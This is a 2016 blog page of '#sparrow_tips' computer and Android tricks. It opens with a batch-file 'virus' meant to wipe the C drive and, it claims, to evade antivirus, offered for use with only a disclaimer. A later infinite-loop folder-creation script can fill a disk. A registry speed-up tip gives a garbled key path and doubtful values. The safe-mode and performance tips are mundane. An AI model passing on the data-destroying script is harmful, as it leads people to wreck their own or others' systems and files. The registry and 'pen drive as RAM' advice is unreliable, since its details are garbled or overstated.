Thursday 3 March 2016

Learn To Make Dangerous Virus In A Minute


What will this virus do ?

You will create this virus using batch file programming. This virus will delete the C Drive completely. The good thing about this virus is that it is not detected by antivirus.
How to Make the virus ?

   1. Open Notepad and copy below code into it.

@Echo off
Del C:\ *.* |y

2. Save this file as sparrow.bat

3. Now, running this file will delete all the content of C Drive

Warning: sparrow won't be responsible for any damages caused . use @ your own risk.

#sparrow_tips

How to Boot Tecno, Infinix and Gionee and other MTK Android devices into Safe Mode

Booting your android device in safe mode enables the device to boot with default settings, that is, all third party apps would automatically be disabled. This function also helps to troubleshoot your android device and also eradicate any form of lag or freezes on your android device.

Method 1

First turn off your smartphone and then turn on, Press and hold the home button while the phone is starting up.
Then in the button left hand corner of the screen, find the Safe Mode option.
That's it, and your smartphone would successfully start in Safe Mode.

Method 2

First turn off your smartphone.
After that, press and hold the Power and Lock button then wait till your device boots to its logo
Immediately it boots to your device logo, then press the Volume Down button , while slipping of the Power button, then make sure the Volume Down button is still held till your device restarts
After that, Safe Mode would be visible on the left bottom of the screen, and then remove your hand from Volume Down button.


Now exit the Safe Mode by pressing the Power or Lock button and then tap Restart
That's it. Using any of the above method would easily start up your android device in Safe Mode.


#sparrow_tips

Steps to speed up your computer performance

Step 1: Start > Right Click on My Computer and select properties.

Step 2: Click on the "Advanced" tab.

Step 3: See the "Performance" section? Click "Settings"

Step 4: Disable all or some of the following:

*Fade or slide menus into view
*Fade or slide ToolTips into view
*Fade out menu items after clicking
*Show Shadows under menus
*Slide open combo boxes
*Slide taskbar buttons
*Use a background image for each folder type
*Use common tasks in folders

Thanks.

#sparrow_tips

Turn On Ur PC In Just 10 Seconds

Step-1 : Click on the start button then press R it will take u to Run well go to
              run

Step-2 : Type Regedit and press enter
              This will open Registery Editor now look for the key

Step-3 : Now there find the Key Called "Startup Delay"
HKEY_LOACAL_MECHINE\SYSTEM\Cur rentControlSet\Control\ContentIndex

Step-4 : Double Click On It.Now where its Base

Step-5 : Click Decimal
              Now its Default Value Is 4800000 (75300:hexadecimal)

Step 6 : Change The Value To 40000
              Here u go u have done it
              Now close the Registery Editor and Restart Your Computer

              You'll See The Result


   Note : Do it only your own Risk.
  
   #sparrow_tips

Simple Trick To Make 1000 Folders In A Few Second

Open notepad and type

@echo off
:top
md %random%
goto top

@echo off - makes it appears to be a blank screen but actually its creating hundreds of folder.

md %random% is the command for creating folders with random names.

goto top – return to label :top, infinite loop

Save it as   sparrow.bat [ name can be anything but .bat is must] then run it..

#sparrow

How to use pen drive as RAM

Yes with some modifications you can use your pen drive as a RAM

1) Connect your pen drive to your PC [Pen drive should be 1 GB or more]

2) Now insert the pen drive .

3) Wait for the PC to detect it.

4) Right click on the My Computer and select the properties

5) Go to advance -> performance setting -> advance

6) Select the pen drive and click on custom size (Check the value of space available)

7) Enter the same in the Initial and the Max columns

" You just used the memory of the pen drive as a Virtual Memory "

8) Now restart your pc and enjoy your fast and super system...


thanks #sparrow